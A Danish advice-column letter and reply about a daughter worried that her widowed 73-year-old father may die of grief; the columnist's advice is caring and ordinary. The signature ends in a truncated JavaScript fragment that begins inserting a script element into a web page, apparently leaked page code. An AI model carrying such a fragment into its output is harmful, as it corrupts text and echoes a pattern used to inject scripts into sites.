Kan far dø af sorg længe efter min mors død?

Kære Suh.
Jeg mistede min mor for ½ år siden, og min far er derfor nu enkemand, 73 år.

Han har et forholdsvis godt helbred, men er ligesom gået helt i stå. Jeg har læst om, at man kan dø af sorg, når ens ægtefælle igennem mange år (de var gift i 51 år) går bort, og jeg er derfor bekymret for at miste ham også.

Jeg kan af gode grunde ikke være hos ham hele tiden, men jeg handler for ham 3 gange om ugen og sørger for, at han får noget ordentligt at spise, og jeg ringer til ham hver dag. Hvad kan jeg mere gøre?

Han skulle gerne leve mange år endnu.
Venlig hilsen Julie

Kære Julie
Det er rigtigt, at man nogle gange ser, at to mennesker, der har været sammen i mange år, dør med kort tids mellemrum. Det er som om, at den ene ikke kan overleve uden den anden. Det er på en måde meget smukt: At to mennesker virkelig for alvor er blevet ét kød, og at den ene halvdel forgår uden den anden – men for de efterladte er det naturligvis et dobbelt tab og dermed en endnu større smerte. Der ses heldigvis også mange (vel endnu flere, gætter jeg på, uden at vide det med statistisk sikkerhed) eksempler på, at den efterladte fortsætter livet på de ændrede vilkår uden andre problemer end den naturlige sorgproces, der naturligvis følger.

Om det går den ene eller den anden vej, afgøres af mange forskellige faktorer, men det handler i særdeleshed om evnen til både at kunne – og ikke mindst at ville – finde mening i livet som enke eller enkemand.

Hvad der måske er fælles for dem, der har lettest ved at leve videre, er uden tvivl det faktum, at der er andre tilbage at elske: Børn, børnebørn, nære venner osv. Kærlighed er meningsgivende i sig selv og er en uhyre stærk drivkraft, ja, selv stærkere end selvopholdelsesdriften. Dertil kommer naturligvis, at den enkelte kan have lyst til at opleve mere i livet; der kan være drømme og ambitioner, man stadig har lyst til at forfølge.

Her er det en stor fordel, at man inden tabet af ægtefællen allerede havde noget, der var ”ens eget”, altså fællesskaber eller fritidsinteresser eller lignende, som man har været engageret i på egen hånd. På den måde har man altså allerede, inden man blev alene, været vant til at gøre noget, som gav mening på egen hånd, ved siden af det som man havde til fælles med ægtefællen.

Vi er dog meget forskellige, så selvom det ikke har været tilfældet, vælger nogle alligevel at tage udfordringen op og opdager måske pludselig, at de besidder ukendte kompetencer og interesser. Det giver dem fornyet lyst til at fortsætte livet, og på den måde kan det blive en selvforstærkende god cirkel. Måske de endda med tiden finder en ny partner at dele resten af livet med.

For din far er der de samme ting i spil. Han har mistet sin livsledsager igennem mange år for ganske kort tid siden, og det er naturligt og forventeligt, at han har brug for tid til at sørge og til at reorientere sig i livet. Men han har stadig dig og måske andre familiemedlemmer, som han kan glæde sig over fællesskab med.

Din praktiske og følelsesmæssige omsorg for ham er en stadig påmindelse om dette, og du kan jo opfordre andre i hans netværk til at gøre det samme: Besøg ham ofte, hellere mange små besøg end få lange, for det vil minde ham om det fællesskab, som han stadig er en del af. Har din far tidligere været engageret i fritidsaktiviteter, så sørg for at opmuntre og støtte ham så meget du kan i, at han får genoptaget dem.

Tal også gerne så meget med ham om din mor, som han og du orker. På den måde oplever din far forhåbentlig, at hun lever videre i jeres hjerter og i jeres bevidsthed – at han kan fastholde noget af hende og det, de havde sammen, i levende live.
Hilsen Suhvar d=document;var s=d.createElement(‘script’);